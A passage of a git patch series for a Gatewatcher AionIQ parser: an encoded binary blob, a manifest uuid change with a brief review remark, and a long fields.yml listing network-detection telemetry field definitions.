zrn)GlM0j!6!@MW&(_OZiQ~PnlgeTV0lgqsmCzHvwR_wi#l>@3}MA-v7hb)1;bI>Uu zKO+P%34nKIunyYswg6@PiTH4p&Xi1Pi12rBsXNXC0FY-Em_(h^)~5Zq%@}64yzP^y zqPQsE4uQ_@zWFACacekN(D`u3b9*@!00wGO;1M3G09+H*0=zeV7a{S{(`)Te-UJF< ziWXeVwXIpVMsiU7)ps0jN|+PkwU(BtdkEGP74;u0ed3?O$aWnQ5tr1Bxz(&#Tn8iB z@If(%godZdQXuVc#H67)jjiw z&%kz5^gKhCeqsIJavV2GGd-w&I@pevtdDby2U&FJ$+aUft-arVVJs9@0~hT4Pr+f* z9Zx}Hgmnx77VPxb zL^_2olUUcb8enIHG{31Kd`%j<>sEw^UG)+oJvYcZ6=v%mH#6==K>|SljPstH$%&%- zK99TS(a4(b-4f%s>(#Tlj2$YV-;xirw3m&-%TBxi)+=QXhurg!Vg>+hO7q8bsLBdj zRXQn*|Fh(#wM)&6?h~_`s~N5^HwB}#_!s_Hp&Y4)os%mcYiF8Kz>^GZe=_WA!=m=ABDsXg7J}?L z&a(EN2TMGk%?<+caar|}PxWgIP>ezXtgfo;FrArj5k4!&mV@0Dulh;S=-11(FcrXS zrs}BWL;EiyWQYj@fZp3f8J~fysQy$goYeJFhV_6#x@h@Z-K(Uz+B|HtIpJB~+H`Pv z+n{Z#Kpz2PijFmmY>n7bCpD;?<-t8=BJB(Q0>Gut?#TkiTbwJwj8t(mae?P+yWN&J z)&$T?71o_Bz*R*DA(1z~qQj=iSY3~fo&-A%u#iT7&S`C83{?e}to@;Lm6v9`LKY%n zH9^d!_C@&pC2Fs>VpvSt9cU%t-gkTBAj9)IkufH@y9-`I{Y$--NAa1zE@5qDK3A0% z{o*G!DYJSo2PoE3%CL==9*A*|p@Cg3J_cbp9Dv`SNi33`JzpUYk)WSQ6KZVsm^IfM z>G9SJKy3xvMpZxzx@^#Jt3#^14$JrNfPy;8pr-l(?kQOZ{3hJj!P+quV`e=)CIMAMB9s3_hcYl2_J6t zJJiACiI3Rr0Wm?TQG^{l`<_Zo-qTWR9#r78w_7cbz(y1_MJ8?OAb01oJxIZ*-kv`< z|59^3jGIe@Aq|>v?RWM|qeL;`fu5cO%!#zYX$@}^gLWDNV1u*cO} zh8y(y@^zI(>8&Q!P4z#aPejwq4C0Bsy7#fyIz@4aqsca52cEqa5?NojM51}H!8?Xr zHwt^O8atL7nR(8d07O<2Bh`N4XDVdWYap}Cqy!iv<)qV?&_v# z2gJ-qXH{MHd?1r_CW1Kv{HTtjr6+$%EAOA(s?Zz+K#@eilYPU5_htCUX3=P|pXpFy zV7lkjMPutpx}lc8;vj1vqUHd1!aT1j{4wl*=A^iMZWuM+Le65h`uw+D+fihk#WL6WnWu`mr3K|`tiomLolEl#kNhh> 
zrvH2t^<*`|V-4103A`F3>BR|XyayPC`uZL1KVfR=&1%UbW2@^8x!afciL_J^I*cn3 zK9%OAdJU8(pJQgV;rO~yPI^W zJO>91u%yp$wb3YK1GG`bJV#rB$Rgd#ui&deozmKOy{VMODx+%Q#OrqOq~Zm#6@jc3 zk~8Yfr%3WRC(1o0x*aiuS4s0is8}XrN~V?DOTwm}B=e61hgLMeltq836W0VSAQrMd z9UE(#)C^s4hDkQu5(bZfRz65UuTh!+wQ`M}_^KqY18&WLJW9z8AcW^l;{VTb_lE3l zWR5Kl`VBNPV;bFHvcct89OIb#abm7n;*#h)J8;J|k~bo(9KBd`w+a}u{VFoa4{aVd z^X5^G*oMhsLi=fHd@%sLrl&bmfyS~yTWa%Xmo~dr7MoB|s#Hya+>+}WZA-iB@Nrz0!pDN;rIyFtL_zEOgLg#!*Iud0*vvvPrOdF?urFdfoxPKZ z;(PY$GPo?XipG)pVvhtJZ``V6Rtu3>IikNV%U}XJ<*`JVm0ar-h}|n9w0ZTP;ZCXh zR(uG)^FF)wKPO<&q!zm09HwWBr3KLMhYm69bl|loupnT#NH2V{$8CiN=Se`4((0Hp z?Du896|yW2CzUm>^4wt5yCee{YGv~tF8cQ6pCcT{1?8mG%3tK9zTMX^ zKnYjD2H^~52a^&)B{;DF!j{!?e((O$Co8s@ldX1os?oRyo*QC$p-c&fCCxBeUU@4c z=BE;Fa`HJCN}v%6NDSkzjC%2%eW8!aZ@NIZ0mb$bzWb|k0;#@Wh{4W9$O;2u%+DWt zOsg5JzrhwB>>PHC6j(o{^-WpGby1;mA0Y_G_dto?sf=dDcOPG!?a3^PN+luL`RY;z zw`<((MX*+j{)8yNUq3^2*(El%FHnj`7}H37zJ<_)%?IGCsMjo0hE$Kt5r4H;9hK*y&Wu?fdMvhG(IOu^s0zX|(odm`p^*{CulM1p0oJ7-{|kSibgjeaa>;cravh6`L4a`B1&$_jc(;cCb6beYc-A46iBm9RUJaH`ef^`~Hfxzn1i zz>%$J$uph(KMwhsZCA(?<~9KHsc*V(CprtH%O=ork@Ex3+Di&o$PHVg}I@?j07FYh^Z)Yrb5=|9rNur>LVqb6BXQSB)QR zLHgRUd#{U=A6kl(|Lpatv5`;VtqYC31z=_bff(zlih%>5RZ1pdRB9QhQ@*>yf+p@F zq=BUHf4*d+lZ>#QXyUxE{KXr%E-UJA%$#@}Y_@_&CH?co5%!iB)Hya>ATFk%gn5Ra zsos8=a#uBX8mFge?YWnR>@%i0rc5H@Lf-_UZ@=T_=t-u(u1g}K-fjq^$*Lod5So5O z9TwW8*|Q?)y@<~L=55tGbe6oJoUPq3eoNB8Gz;ezL1Lma5a;ub85d!M+9KGsPtPPU z=kL+qH;D(i`2rm0Msuv-d>ENr9O0k>iLh_t0#UFU-TecJfelfDMq!fevqE372%u*e z(1Q)JV3+abz$##>DeLgQg7=3abWo^&+K5;#npv3wxDmXWl4+=w&HL4wR5I}lr_>L} z-q#q9ZpO$}GL4$S&&qAi>{PxE-GJvM9(rh+7m&y<^N+cV}eT|D3f>hc7honwBY=fQ!h<0bV8dQu?YLmS-suFQbs(AD?! 
z-ef)iO4Wq5!w=xpAcI|lHd&F!aGH*J@y=(-Z#%#lYBT7`)KcOAmxh!}P8#o5ujGRG z2bxAP3nRyQe&`=F)PoE@1<8{V_8X^_#NWS&^6TRlaUxruu21H#hzI=Wxltrf z9ZBAw=YP%+-vj591kO#=)YA=d5jL2VOarTS=u-mYw!rlHKaaks=f?ANp5^IwYIa~} zQiXG2+;C+Odh7UKBjt2;%>o0TaSv7@H#SJu@W&=RZzHYDm1t9N{4CUFo|M*xHUi!% zFjf9biVTiyX1X3dShR{6qjqbNyDw>8>@bqLft$VGz!g(c&`}AW+uVlv463^*2q8x| zB&~hzfDDDgKfBY*xz$SA26rVirV~P@6*df6iX1~3La9EyxanaaKCJ2e&V?&EJ^A_Q z{$Gk=*Vr$7qi2K8ZJ`JF>x%0XJa<7Dt(r&Dr0uh}s@_bMcAKJrq1wDyZa5y7#7r{O zWc`=2f0d&vo_e%i3tgDBhLFF_t}7z42;{g9C+G8IJTwqj%G=tyo|Y&QEnr4 zw0@#1!r4r-;TQ>P78K4r{(<$2&u?(g()zGz&CK}+WgSY^d4B1h<9w|&eOp+9nHI93 z+P37u%TEFVWa*KnPZb3%&Z6v-&L4zT zT@Y^|5obbv`V2m?3I;L;O-x?6qn9Ba?%UwDA`Zr}!x_NXVfpCk%o~Gj1O{EjA>f$d z=T|Wm$CD6GI95S^?FtTJ=d@eBM^4m=ZbeK7|GSoEnfVh;YX@ZGmd>(@Tlc+ ziQqP$S#m#-u#~+0@`do~*;C7+jvbJ||e^b2R>h#lMr{5KDYqA3chIunJy2fxU^-X)hZ_0MJZ5!z7@S>vV@7g0 zd#0Z#>*Ge4peY8(;W`plr~j{gNc)%b`MXEoPG&R0Kyh5#cX0IeXO@sMcdvl;0@%!9 zNQnrFEuhtU{9s5EhTR{RCuM_aMvkDFweJOdmdjk|7e~-S4@#F8qn6bL&7=l>=zWwG zjVD}99)+IBHj={O)9x33gBmTk!$U38tU%DRTbXg+d{pMp0F&pkT}iEKj3b4|O9VCu z5}l7*TrB^z=`!`H(%i4O{CoqHE(%n$T)u@p8k^tD{NSnI3M~rael1gl;}jB7B8x{G zteoj+;>tjhh`=R8h!dm@nd;HTs)r^+FHD#5`FKlXKYCLgD^rJ+$R07Sk$G67HPJ>c z*KYJLtC#u7W9a&T$~r_RwuSbiFl*l;Q`wXj#){?hxGhtWw2T+3prcLAIBW^=FS6OG zD{jEp4jdcAE$n$ZOI8{jt+oySz-Xq4yCiINHELwYqdLcXb#;ioUh_PlmYYIDlN_jN zSytdhunS(C8!S?B&6=nsfb)(utYlyEBRk$GME$=J*b|zw)Vh!p=sv`?>Li Zg53KJdXMw57+eXUDEn5XO3F0k{{to~p(+3X diff --git a/GateWatcher/aioniq/_meta/manifest.yml b/GateWatcher/aioniq/_meta/manifest.yml index ca91ad93d..a540d5536 100644 --- a/GateWatcher/aioniq/_meta/manifest.yml +++ b/GateWatcher/aioniq/_meta/manifest.yml @@ -1,4 +1,4 @@ -uuid: bba2bed2-d925-440f-a0ce-dbcae04eaf26 +uuid: 0825709a-5f76-441e-9dfb-2b5ea6ce551c name: Gatewatcher AionIQ slug: aioniq From 11945edeaff93815c184a2cae0514354cb82e48b Mon Sep 17 00:00:00 2001 
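Review bot: The manifest hunk replaces the uuid of the already-existing Gatewatcher AionIQ module (`-uuid: bba2bed2-d925-440f-a0ce-dbcae04eaf26` → `+uuid: 0825709a-5f76-441e-9dfb-2b5ea6ce551c`) while name and slug stay the same, and nothing in the patch says why. If the platform keys modules and their intake formats by this uuid — which is what a manifest-level uuid usually is, but cannot be confirmed from here — this is an identity change rather than a version bump, and anything bound to the old value would stop resolving. A short justification in the commit message (for example that the old uuid is being handed to the new aioniq_ecs module introduced in the following patch) would make the change reviewable and let maintainers check for dangling references.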
From: Clement Lyonnet Date: Mon, 9 Sep 2024 17:57:00 +0200 Subject: [PATCH 009/317] Added the manifest and fields files for the ECS parser
---
 GateWatcher/aioniq_ecs/_meta/fields.yml | 1133 ++++++++++++++++++++-
 GateWatcher/aioniq_ecs/_meta/manifest.yml | 11 +
 2 files changed, 1143 insertions(+), 1 deletion(-)
 create mode 100644 GateWatcher/aioniq_ecs/_meta/manifest.yml
diff --git a/GateWatcher/aioniq_ecs/_meta/fields.yml b/GateWatcher/aioniq_ecs/_meta/fields.yml
index c6cac6926..e6f4b0b85 100644
--- a/GateWatcher/aioniq_ecs/_meta/fields.yml
+++ b/GateWatcher/aioniq_ecs/_meta/fields.yml
@@ -1 +1,1132 @@ -empty +gatewatcher.beacon.active: + description: beacon active field + name: gatewatcher.beacon.active + type: text +gatewatcher.beacon.hostname_resolution: + description: beacon hostname_resolution field + name: gatewatcher.beacon.hostname_resolution + type: text +gatewatcher.beacon.id: + description: beacon id field + name: gatewatcher.beacon.id + type: text +gatewatcher.beacon.mean_time_interval: + description: beacon mean_time_interval + name: gatewatcher.beacon.mean_time_interval + type: text +gatewatcher.beacon.possible_cnc: + description: beaocn possible_cnc field + name: gatewatcher.beacon.possible_cnc + type: text +gatewatcher.beacon.session_count: + description: beacon session_count field + name: gatewatcher.beacon.session_count + type: text +gatewatcher.beacon.type: + description: beacon type field + name: gatewatcher.beacon.type + type: text +gatewatcher.dcerpc: + description: dcerpc metadata field + name: gatewatcher.dcerpc + type: text +gatewatcher.dcerpc.call_id: + description: dcerpc call_id field + name: gatewatcher.dcerpc.call_id + type: number +gatewatcher.dcerpc.interfaces: + description: dcerpc interfaces field + name: gatewatcher.dcerpc.interfaces + type: text +gatewatcher.dcerpc.req: + description: dcerpc req field + name: gatewatcher.dcerpc.req + type: text +gatewatcher.dcerpc.request: + description: dcerpc request field + name: gatewatcher.dcerpc.request + type: text +gatewatcher.dcerpc.res: + description: dcerpc res field + name: gatewatcher.dcerpc.res + type: text +gatewatcher.dcerpc.response: + description: dcerpc response field + name: gatewatcher.dcerpc.response + type: text +gatewatcher.dcerpc.rpc_version: + description: dcerpc rpc_version field + name: gatewatcher.dcerpc.rpc_version + type: text +gatewatcher.dga.dga_count: + description: dga dga_count field + name: gatewatcher.dga.dga_count + type: text +gatewatcher.dga.dga_ratio: + description: dga dga_ratio field + name: gatewatcher.dga.dga_ratio + type: text 
+gatewatcher.dga.malware_behavior_confidence: + description: dga malware_behavior_confidence field + name: gatewatcher.dga.malware_behavior_confidence + type: text +gatewatcher.dga.nx_domain_count: + description: dga nx_domain_count field + name: gatewatcher.dga.nx_domain_count + type: text +gatewatcher.dga.top_DGA: + description: dga top_DGA field + name: gatewatcher.dga.top_DGA + type: text +gatewatcher.dhcp: + description: dhcp metadata field + name: gatewatcher.dhcp + type: text +gatewatcher.dhcp.assigned_ip: + description: dhcp assigned_ip field + name: gatewatcher.dhcp.assigned_ip + type: ip +gatewatcher.dhcp.client_ip: + description: dhcp client_ip field + name: gatewatcher.dhcp.client_ip + type: ip +gatewatcher.dhcp.client_mac: + description: dhcp client_mac field + name: gatewatcher.dhcp.client_mac + type: text +gatewatcher.dhcp.dhcp_type: + description: dhcp dhcp_type field + name: gatewatcher.dhcp.dhcp_type + type: text +gatewatcher.dhcp.dns_servers: + description: dhcp dns_servers field + name: gatewatcher.dhcp.dns_servers + type: text +gatewatcher.dhcp.hostname: + description: dhcp hostname field + name: gatewatcher.dhcp.hostname + type: text +gatewatcher.dhcp.id: + description: dhcp id field + name: gatewatcher.dhcp.id + type: number +gatewatcher.dhcp.lease_time: + description: dhcp lease_time field + name: gatewatcher.dhcp.lease_time + type: number +gatewatcher.dhcp.lease_type: + description: dhcp lease_type field + name: gatewatcher.dhcp.lease_type + type: number +gatewatcher.dhcp.next_server_ip: + description: dhcp next_server_ip field + name: gatewatcher.dhcp.next_server_ip + type: ip +gatewatcher.dhcp.relay_ip: + description: dhcp relay_ip field + name: gatewatcher.dhcp.relay_ip + type: ip +gatewatcher.dhcp.routers: + description: dhcp routers field + name: gatewatcher.dhcp.routers + type: text +gatewatcher.dhcp.subnet_mask: + description: dhcp subnet_mask field + name: gatewatcher.dhcp.subnet_mask + type: ip +gatewatcher.dhcp.type: + 
description: dhcp type field + name: gatewatcher.dhcp.type + type: text +gatewatcher.dnp3.application: + description: dnp3 application field + name: gatewatcher.dnp3.application + type: text +gatewatcher.dnp3.control: + description: dnp3 control field + name: gatewatcher.dnp3.control + type: text +gatewatcher.dnp3.dst: + description: dnp3 dst field + name: gatewatcher.dnp3.dst + type: number +gatewatcher.dnp3.iin: + description: dnp3 iin field + name: gatewatcher.dnp3.iin + type: text +gatewatcher.dnp3.src: + description: dnp3 src field + name: gatewatcher.dnp3.src + type: text +gatewatcher.dnp3.type: + description: dnp3 type field + name: gatewatcher.dnp3.type + type: text +gatewatcher.dns: + description: dns metadata field + name: gatewatcher.dns + type: text +gatewatcher.email.body_md5: + description: smtp email subject_md5 field + name: gatewatcher.email.body_md5 + type: text +gatewatcher.email.from: + description: email from field + name: gatewatcher.email.from + type: text +gatewatcher.email.status: + description: email status field + name: gatewatcher.email.status + type: text +gatewatcher.email.subject_md5: + description: smtp subject_md5 field + name: gatewatcher.email.subject_md5 + type: text +gatewatcher.email.to: + description: email to field + name: gatewatcher.email.to + type: text +gatewatcher.event.created: + description: Event created field + name: gatewatcher.event.created + type: datetime +gatewatcher.event.id: + description: Event id field + name: gatewatcher.event.id + type: text +gatewatcher.event_type: + description: Type of event + name: gatewatcher.event_type + type: keyword +gatewatcher.file.file_id: + description: file file_id field + name: gatewatcher.file.file_id + type: number +gatewatcher.file.gaps: + description: file gaps field + name: gatewatcher.file.gaps + type: boolean +gatewatcher.file.hash.md5: + description: File MD5 hash field + name: gatewatcher.file.hash.md5 + type: text +gatewatcher.file.hash.sha256: + description: File 
SHA256 hash field + name: gatewatcher.file.hash.sha256 + type: text +gatewatcher.file.magic: + description: File magic field + name: gatewatcher.file.magic + type: text +gatewatcher.file.sid: + description: file sid array field + name: gatewatcher.file.sid + type: text +gatewatcher.file.state: + description: File state field + name: gatewatcher.file.state + type: text +gatewatcher.file.stored: + description: File stored field + name: gatewatcher.file.stored + type: boolean +gatewatcher.file.tx_id: + description: file tx_id field + name: gatewatcher.file.tx_id + type: number +gatewatcher.files: + description: files field + name: gatewatcher.files + type: text +gatewatcher.flow.bytes_toclient: + description: flow bytes_toclient field + name: gatewatcher.flow.bytes_toclient + type: number +gatewatcher.flow.bytes_toserver: + description: flow bytes_toserver field + name: gatewatcher.flow.bytes_toserver + type: number +gatewatcher.flow.pkts_toclient: + description: flow pkts_toclient field + name: gatewatcher.flow.pkts_toclient + type: number +gatewatcher.flow.pkts_toserver: + description: flow pkts_toserver field + name: gatewatcher.flow.pkts_toserver + type: number +gatewatcher.flow.start: + description: flow start field + name: gatewatcher.flow.start + type: datetime +gatewatcher.ftp: + description: ftp metadata field + name: gatewatcher.ftp + type: text +gatewatcher.ftp.command: + description: ftp command field + name: gatewatcher.ftp.command + type: text +gatewatcher.ftp.command_truncated: + description: ftp command_truncated field + name: gatewatcher.ftp.command_truncated + type: boolean +gatewatcher.ftp.completion_code: + description: ftp completion_code field + name: gatewatcher.ftp.completion_code + type: text +gatewatcher.ftp.reply: + description: ftp reply field + name: gatewatcher.ftp.reply + type: text +gatewatcher.ftp.reply_received: + description: ftp reply_received field + name: gatewatcher.ftp.reply_received + type: text 
+gatewatcher.ftp.reply_truncated: + description: ftp reply_truncated field + name: gatewatcher.ftp.reply_truncated + type: boolean +gatewatcher.ftp_data.command: + description: ftp_data command field + name: gatewatcher.ftp_data.command + type: text +gatewatcher.ftp_data.filename: + description: ftp_data filename field + name: gatewatcher.ftp_data.filename + type: text +gatewatcher.gcap: + description: Name of the gcap + name: gatewatcher.gcap + type: keyword +gatewatcher.gcenter: + description: Name of the associated gcenter + name: gatewatcher.gcenter + type: keyword +gatewatcher.history.code: + description: history code field + name: gatewatcher.history.code + type: number +gatewatcher.history.content: + description: history content field + name: gatewatcher.history.content + type: text +gatewatcher.history.endpoint: + description: history endpoint field + name: gatewatcher.history.endpoint + type: text +gatewatcher.history.id: + description: history id field + name: gatewatcher.history.id + type: number +gatewatcher.history.ip: + description: history ip field + name: gatewatcher.history.ip + type: ip +gatewatcher.history.method: + description: history method field + name: gatewatcher.history.method + type: text +gatewatcher.history.name: + description: history name field + name: gatewatcher.history.name + type: text +gatewatcher.history.type: + description: history type field + name: gatewatcher.history.type + type: text +gatewatcher.http: + description: http metadata field + name: gatewatcher.http + type: text +gatewatcher.http.accept: + description: 'http accept metadata field ' + name: gatewatcher.http.accept + type: text +gatewatcher.http.accept_language: + description: http accept language field + name: gatewatcher.http.accept_language + type: text +gatewatcher.http.hostname: + description: http hostname field metadata + name: gatewatcher.http.hostname + type: text +gatewatcher.http.http2: + description: http http2 field + name: gatewatcher.http.http2 + 
type: text +gatewatcher.http.http_refer: + description: http_refer field + name: gatewatcher.http.http_refer + type: text +gatewatcher.ikev2.errors: + description: ikev2 errors field + name: gatewatcher.ikev2.errors + type: number +gatewatcher.ikev2.exchange_type: + description: ikev2 exchange_type field + name: gatewatcher.ikev2.exchange_type + type: number +gatewatcher.ikev2.init_spi: + description: ikev2 init_spi field + name: gatewatcher.ikev2.init_spi + type: text +gatewatcher.ikev2.message_id: + description: ikev2 message_id field + name: gatewatcher.ikev2.message_id + type: number +gatewatcher.ikev2.notify: + description: ikev2 notify field + name: gatewatcher.ikev2.notify + type: text +gatewatcher.ikev2.payload: + description: ikev2 payload field + name: gatewatcher.ikev2.payload + type: text +gatewatcher.ikev2.resp_spi: + description: ikev2 resp_spi field + name: gatewatcher.ikev2.resp_spi + type: text +gatewatcher.ikev2.role: + description: ikev2 role field + name: gatewatcher.ikev2.role + type: text +gatewatcher.ikev2.version_major: + description: ikev2 version_major field + name: gatewatcher.ikev2.version_major + type: number +gatewatcher.ikev2.version_minor: + description: ikev2 version_minor field + name: gatewatcher.ikev2.version_minor + type: number +gatewatcher.ioc.campaings: + description: ioc campaigns field + name: gatewatcher.ioc.campaings + type: text +gatewatcher.ioc.case_id: + description: ioc case_id field + name: gatewatcher.ioc.case_id + type: text +gatewatcher.ioc.categories: + description: ioc categories field + name: gatewatcher.ioc.categories + type: text +gatewatcher.ioc.creation_date: + description: ioc creation_date field + name: gatewatcher.ioc.creation_date + type: datetime +gatewatcher.ioc.description: + description: ioc description field + name: gatewatcher.ioc.description + type: text +gatewatcher.ioc.extrernal_links: + description: ioc external_links field + name: gatewatcher.ioc.extrernal_links + type: text 
+gatewatcher.ioc.families: + description: ioc families field + name: gatewatcher.ioc.families + type: text +gatewatcher.ioc.kill_chain_phases: + description: ioc kill_chain_phases field + name: gatewatcher.ioc.kill_chain_phases + type: text +gatewatcher.ioc.meta_data.cwe: + description: ioc meta_data cwe field + name: gatewatcher.ioc.meta_data.cwe + type: text +gatewatcher.ioc.meta_data.descriptions: + description: ioc meta_data descriptions field + name: gatewatcher.ioc.meta_data.descriptions + type: text +gatewatcher.ioc.meta_data.usageMode: + description: ioc meta_data usageMode field + name: gatewatcher.ioc.meta_data.usageMode + type: text +gatewatcher.ioc.package_date: + description: ioc package_date field + name: gatewatcher.ioc.package_date + type: datetime +gatewatcher.ioc.relations: + description: ioc relations field + name: gatewatcher.ioc.relations + type: text +gatewatcher.ioc.signature: + description: ioc signature field + name: gatewatcher.ioc.signature + type: text +gatewatcher.ioc.tags: + description: ioc tags field + name: gatewatcher.ioc.tags + type: text +gatewatcher.ioc.targeted_countries: + description: ioc targeted_countires field + name: gatewatcher.ioc.targeted_countries + type: text +gatewatcher.ioc.targeted_organizations: + description: ioc targeted_organizations field + name: gatewatcher.ioc.targeted_organizations + type: text +gatewatcher.ioc.targeted_platforms: + description: ioc targeted_platforms field + name: gatewatcher.ioc.targeted_platforms + type: text +gatewatcher.ioc.targeted_sectors: + description: ioc targeted_sectors field + name: gatewatcher.ioc.targeted_sectors + type: text +gatewatcher.ioc.threat_actor: + description: ioc threat_actor field + name: gatewatcher.ioc.threat_actor + type: text +gatewatcher.ioc.tlp: + description: ioc tlp field + name: gatewatcher.ioc.tlp + type: text +gatewatcher.ioc.ttp: + description: ioc ttp field + name: gatewatcher.ioc.ttp + type: text +gatewatcher.ioc.type: + description: ioc type field 
+ name: gatewatcher.ioc.type + type: text +gatewatcher.ioc.updated_date: + description: ioc updated_date field + name: gatewatcher.ioc.updated_date + type: datetime +gatewatcher.ioc.usage_mode: + description: ioc usage_mode field + name: gatewatcher.ioc.usage_mode + type: text +gatewatcher.ioc.value: + description: ioc value field + name: gatewatcher.ioc.value + type: text +gatewatcher.krb5.cname: + description: krb5 cname field + name: gatewatcher.krb5.cname + type: text +gatewatcher.krb5.encryption: + description: krb5 encryption field + name: gatewatcher.krb5.encryption + type: text +gatewatcher.krb5.error_code: + description: krb5 error_code field + name: gatewatcher.krb5.error_code + type: text +gatewatcher.krb5.failed_request: + description: krb5 failed_request field + name: gatewatcher.krb5.failed_request + type: text +gatewatcher.krb5.msg_type: + description: krb5 msg_type field + name: gatewatcher.krb5.msg_type + type: text +gatewatcher.krb5.realm: + description: krb5 realm field + name: gatewatcher.krb5.realm + type: text +gatewatcher.krb5.sname: + description: krb5 sname field + name: gatewatcher.krb5.sname + type: text +gatewatcher.krb5.weak_encryption: + description: krb5 weak_encryption field + name: gatewatcher.krb5.weak_encryption + type: boolean +gatewatcher.malcore.analyzed_clean: + description: malcore analyzed_clean field + name: gatewatcher.malcore.analyzed_clean + type: number +gatewatcher.malcore.analyzed_error: + description: malcore analyzed_error field + name: gatewatcher.malcore.analyzed_error + type: number +gatewatcher.malcore.analyzed_infected: + description: malcore analyzed_infected field + name: gatewatcher.malcore.analyzed_infected + type: number +gatewatcher.malcore.analyzed_other: + description: malcore analyzed_other field + name: gatewatcher.malcore.analyzed_other + type: number +gatewatcher.malcore.analyzed_suspicious: + description: malcore analyzed_suspicious field + name: gatewatcher.malcore.analyzed_suspicious + type: 
number +gatewatcher.malcore.analyzers_up: + description: malcore analyzers_up field + name: gatewatcher.malcore.analyzers_up + type: number +gatewatcher.malcore.code: + description: malcore code field + name: gatewatcher.malcore.code + type: number +gatewatcher.malcore.detail_scan_time: + description: malcore detail_scan_time field + name: gatewatcher.malcore.detail_scan_time + type: number +gatewatcher.malcore.detail_threat_found: + description: malcore detail_threat_found field + name: gatewatcher.malcore.detail_threat_found + type: text +gatewatcher.malcore.detail_wait_time: + description: malcore detail_wait_time field + name: gatewatcher.malcore.detail_wait_time + type: number +gatewatcher.malcore.engine_id: + description: malcore engine_id field + name: gatewatcher.malcore.engine_id + type: text +gatewatcher.malcore.engines_last_update_date: + description: malcore engines_last_update_date field + name: gatewatcher.malcore.engines_last_update_date + type: datetime +gatewatcher.malcore.file: + description: Identifier of the file + name: gatewatcher.malcore.file + type: keyword +gatewatcher.malcore.file_type: + description: malcore file_type field + name: gatewatcher.malcore.file_type + type: text +gatewatcher.malcore.file_type_description: + description: malcore file_type_description field + name: gatewatcher.malcore.file_type_description + type: text +gatewatcher.malcore.magic: + description: The magic number of the executable of the malware + name: gatewatcher.malcore.magic + type: keyword +gatewatcher.malcore.magic_details: + description: malcore magic_details field + name: gatewatcher.malcore.magic_details + type: text +gatewatcher.malcore.processing_time: + description: malcore processing_time field + name: gatewatcher.malcore.processing_time + type: number +gatewatcher.malcore.replica: + description: Analysis is a replica of another previous one + name: gatewatcher.malcore.replica + type: keyword +gatewatcher.malcore.reporting_token: + description: 
malcore reporting_token field + name: gatewatcher.malcore.reporting_token + type: text +gatewatcher.malcore.state: + description: malcore state field + name: gatewatcher.malcore.state + type: text +gatewatcher.malcore.total_found: + description: malcore total_found field + name: gatewatcher.malcore.total_found + type: text +gatewatcher.malicious_powershell.id: + description: malicious_powershell id field + name: gatewatcher.malicious_powershell.id + type: text +gatewatcher.malicious_powershell.proba_obfuscated: + description: malicious_powershell proba_obfuscated field + name: gatewatcher.malicious_powershell.proba_obfuscated + type: number +gatewatcher.malicious_powershell.sample_id: + description: malicious_powershell sample_id field + name: gatewatcher.malicious_powershell.sample_id + type: text +gatewatcher.malicious_powershell.score: + description: malicious_powershell score field + name: gatewatcher.malicious_powershell.score + type: number +gatewatcher.malicious_powershell.score_details: + description: malicious_powershell score_details field + name: gatewatcher.malicious_powershell.score_details + type: text +gatewatcher.matched_event.file.gaps: + description: matched_event file gaps field + name: gatewatcher.matched_event.file.gaps + type: text +gatewatcher.matched_event.file.hash.md5: + description: matched_event file hash md5 field + name: gatewatcher.matched_event.file.hash.md5 + type: text +gatewatcher.matched_event.file.hash.sha256: + description: matched_event file hash sha256 field + name: gatewatcher.matched_event.file.hash.sha256 + type: text +gatewatcher.matched_event.file.magic: + description: matched_event file magic field + name: gatewatcher.matched_event.file.magic + type: text +gatewatcher.matched_event.file.name: + description: matched_event file name field + name: gatewatcher.matched_event.file.name + type: text +gatewatcher.matched_event.file.sid: + description: matched_event file sid field + name: gatewatcher.matched_event.file.sid + 
type: text +gatewatcher.matched_event.file.size: + description: matched_event file size field + name: gatewatcher.matched_event.file.size + type: text +gatewatcher.matched_event.file.state: + description: matched_event file state field + name: gatewatcher.matched_event.file.state + type: text +gatewatcher.matched_event.file.stored: + description: matched_event file stored field + name: gatewatcher.matched_event.file.stored + type: text +gatewatcher.matched_event.file.tx_id: + description: matched_event file tx_id field + name: gatewatcher.matched_event.file.tx_id + type: text +gatewatcher.matched_event.id: + description: matched_event id field + name: gatewatcher.matched_event.id + type: text +gatewatcher.metadata.flowbits: + description: metadata flowbits field + name: gatewatcher.metadata.flowbits + type: text +gatewatcher.mqtt.connack: + description: mqtt connack field + name: gatewatcher.mqtt.connack + type: text +gatewatcher.nb_rescans: + description: Number of retroact analysis + name: gatewatcher.nb_rescans + type: long +gatewatcher.nba.action: + description: nba action field + name: gatewatcher.nba.action + type: text +gatewatcher.nba.category: + description: nba category field + name: gatewatcher.nba.category + type: text +gatewatcher.nba.gid: + description: nba gid field + name: gatewatcher.nba.gid + type: text +gatewatcher.nba.metadata.performance_impact: + description: nba metadata performance_impact field + name: gatewatcher.nba.metadata.performance_impact + type: text +gatewatcher.nba.metadata.signature_severity: + description: nba metadata signature_severity field + name: gatewatcher.nba.metadata.signature_severity + type: text +gatewatcher.nba.packet: + description: nba packet field + name: gatewatcher.nba.packet + type: text +gatewatcher.nba.payload: + description: nba payload field + name: gatewatcher.nba.payload + type: text +gatewatcher.nba.payload_printable: + description: nba payload_printable field + name: gatewatcher.nba.payload_printable + 
type: text +gatewatcher.nba.rev: + description: nba rev field + name: gatewatcher.nba.rev + type: text +gatewatcher.nba.signature: + description: nba signature field + name: gatewatcher.nba.signature + type: text +gatewatcher.nba.signature_id: + description: nba signature_id field + name: gatewatcher.nba.signature_id + type: text +gatewatcher.nba.stream: + description: nba stream field + name: gatewatcher.nba.stream + type: text +gatewatcher.network.flow_id: + description: Gatewatcher specific flow_id for network part + name: gatewatcher.network.flow_id + type: number +gatewatcher.network.timestamp: + description: Network timestamp field + name: gatewatcher.network.timestamp + type: datetime +gatewatcher.network.tx_id: + description: tx_id network field + name: gatewatcher.network.tx_id + type: number +gatewatcher.nfs.file_tx: + description: nfs file_tx field + name: gatewatcher.nfs.file_tx + type: boolean +gatewatcher.nfs.filename: + description: nfs filename field + name: gatewatcher.nfs.filename + type: text +gatewatcher.nfs.hhash: + description: nfs hhash field + name: gatewatcher.nfs.hhash + type: text +gatewatcher.nfs.id: + description: nfs id field + name: gatewatcher.nfs.id + type: number +gatewatcher.nfs.procedure: + description: nfs procedure field + name: gatewatcher.nfs.procedure + type: text +gatewatcher.nfs.status: + description: nfs status field + name: gatewatcher.nfs.status + type: text +gatewatcher.nfs.type: + description: nfs type field + name: gatewatcher.nfs.type + type: text +gatewatcher.nfs.version: + description: nfs version field + name: gatewatcher.nfs.version + type: number +gatewatcher.notification.component: + description: notification component field + name: 